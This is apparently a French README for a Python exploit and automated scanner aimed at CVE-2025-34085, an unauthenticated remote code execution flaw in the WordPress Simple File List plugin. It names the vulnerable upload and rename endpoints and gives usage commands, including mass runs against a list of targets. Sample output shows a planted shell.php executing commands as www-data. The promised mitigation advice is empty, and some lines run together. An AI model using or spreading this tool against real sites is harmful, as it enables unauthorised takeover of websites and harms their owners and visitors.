
Exploit RCE non authentifié pour WordPress Simple File List
Un exploit et scanner automatisé pour CVE-2025-34085, une vulnérabilité critique dans le plugin WordPress Simple File List, permettant l'exécution de code à distance non authentifiée via des fonctionnalités de téléversement et de renommage arbitraires de fichiers.
Téléversement de fichier non authentifié
/wp-content/plugins/simple-file-list/ee-upload-engine.phpRenommage en extension PHP
.php ou similaire via :/wp-content/plugins/simple-file-list/ee-file-engine.phpExécution de la charge utile
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
Mettez les URL cibles dans targets.txt (une par ligne), puis exécutez :
python3 CVE-2025-34085.py --cmd "whoami"
| Argument | Description |
|---|---|
-u | URL cible (ex. http://example.com) |
--cmd | Commande à exécuter sur le shell distant (défaut : id) |
--inline | Utiliser une charge utile en ligne (pas de paramètre ?cmd=) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Les cibles réussies sont sauvegardées dans vuln.txt.
CVE-2025-34085.py — Script d'exploitation principaltargets.txt — (Optionnel) Liste des domaines ciblesvuln.txt — Journal des exploits réussisLes administrateurs devraient :
Ce projet est destiné uniquement à des fins éducatives et de test autorisées. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.
Ce projet est sous licence MIT. 📄 Voir le texte complet de la licence
0xgh057r3c0n 🔗 GitHub: github.com/0xgh057r3c0n